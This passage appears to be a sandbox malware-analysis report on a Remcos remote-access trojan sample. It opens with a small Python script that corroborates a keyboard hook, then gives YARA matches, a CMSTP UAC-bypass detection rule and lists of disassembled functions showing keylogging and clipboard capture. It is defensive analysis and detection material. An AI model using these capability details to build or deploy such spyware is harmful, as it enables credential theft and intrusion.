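    funcs = [f for f in map(parse_function, lines) if f]
    hooks = [h for h in map(parse_hook_set, lines) if h]
    static_kbd = any(f["hook"] == "WH_KEYBOARD_LL" for f in funcs)
    dynamic_kbd = any(h["kind"] == "keyboard" and not h["system_module"] for h in hooks)
    return {"functions": funcs, "hooks_set": hooks,
            "keyboard_hook_corroborated": static_kbd and dynamic_kbd}

# Rows copied from the report above (constructed input so the script runs stand-alone).
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000005_2_004099E4",
    r"Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Graias\graias.exe",
    r"Source: C:\Windows\SysWOW64\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll",
    r"Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6",
    r"Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,5_2_00409B10",
]

if __name__ == "__main__":
    ev = analyze(SAMPLE_ROWS)
    for f in ev["functions"]:
        print(f["id"], f["hook"] or "", f["capabilities"])
    for h in ev["hooks_set"]:
        print(h["kind"], "hook by", h["module"], "(system module)" if h["system_module"] else "")
    print("keyboard hook corroborated at runtime:", ev["keyboard_hook_corroborated"])
```

The corroboration flag is the useful output: a SetWindowsHookEx call in disassembly only proves capability, while the runtime row proves the hook was installed, and requiring the installing module to be outside C:\Windows keeps DirectInput's own mouse hook from counting as sample behaviour.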

                E-Banking Fraud

                barindex
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\graias\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041BB81 SystemParametersInfoW
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041BB87 SystemParametersInfoW

                System Summary

                barindex
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_00401806 NtdllDefWindowProc_W
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_004016FD NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_01325E6C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_01327AA8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_05528728
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_05528718
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0797E760
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_079766BC
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_079733F0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_07974FB0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0797E752
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_0797A1E8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_07991F1C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 0_2_079929C0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004520E2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041D081
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043D0A8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00437160
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004361BA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00426264
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00431387
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043652C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041E5EF
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0044C749
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004367D6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004267DB
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043C9ED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00432A59
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00436A9D
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043CC1C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00436D58
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00434D32
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043CE4B
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00440E30
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00426E83
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00412F45
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00452F10
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00426FBD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_00EB5E6C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_00EB7AA8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_02918728
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_029186C5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D066BC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0E760
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D033F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D04FB0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0E752
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D0A1E8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 6_2_06D21F1C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D229C06_2_06D229C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D21F106_2_06D21F10
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E087196_2_06E08719
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03FC16_2_06E03FC1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03FD06_2_06E03FD0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E003BB6_2_06E003BB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03B986_2_06E03B98
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E037606_2_06E03760
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E057686_2_06E05768
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E057586_2_06E05758
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E033286_2_06E03328
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E078206_2_06E07820
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E0B1C86_2_06E0B1C8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100171948_2_10017194
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_1000B5C18_2_1000B5C1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B04038_2_0044B040
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0043610D38_2_0043610D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044731038_2_00447310
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044A49038_2_0044A490
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040755A38_2_0040755A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0043C56038_2_0043C560
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B61038_2_0044B610
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044D6C038_2_0044D6C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004476F038_2_004476F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B87038_2_0044B870
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044081D38_2_0044081D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0041495738_2_00414957
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004079EE38_2_004079EE
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00407AEB38_2_00407AEB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044AA8038_2_0044AA80
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00412AA938_2_00412AA9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404B7438_2_00404B74
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404B0338_2_00404B03
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044BBD838_2_0044BBD8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404BE538_2_00404BE5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404C7638_2_00404C76
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00415CFE38_2_00415CFE
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00416D7238_2_00416D72
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00446D3038_2_00446D30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00446D8B38_2_00446D8B
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00406E8F38_2_00406E8F
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040503839_2_00405038
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041208C39_2_0041208C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004050A939_2_004050A9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040511A39_2_0040511A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043C13A39_2_0043C13A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004051AB39_2_004051AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044930039_2_00449300
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040D32239_2_0040D322
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A4F039_2_0044A4F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043A5AB39_2_0043A5AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041363139_2_00413631
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044669039_2_00446690
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A73039_2_0044A730
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004398D839_2_004398D8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004498E039_2_004498E0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A88639_2_0044A886
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043DA0939_2_0043DA09
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00438D5E39_2_00438D5E
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00449ED039_2_00449ED0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041FE8339_2_0041FE83
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00430F5439_2_00430F54
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004050C241_2_004050C2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004014AB41_2_004014AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040513341_2_00405133
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004051A441_2_004051A4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040124641_2_00401246
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040CA4641_2_0040CA46
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040523541_2_00405235
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004032C841_2_004032C8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040168941_2_00401689
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00402F6041_2_00402F60
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 00433FC0 appears 55 times
                Source: iGhDjzEiDU.exeBinary or memory string: OriginalFilename vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1681031697.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000000.1643420254.0000000000C60000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEPoD.exe2 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1715778624.0000000009470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1712515053.0000000007873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1714219089.0000000007940000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003194000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000005.00000002.1683664559.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exeBinary or memory string: OriginalFilenameEPoD.exe2 vs iGhDjzEiDU.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
                Source: iGhDjzEiDU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
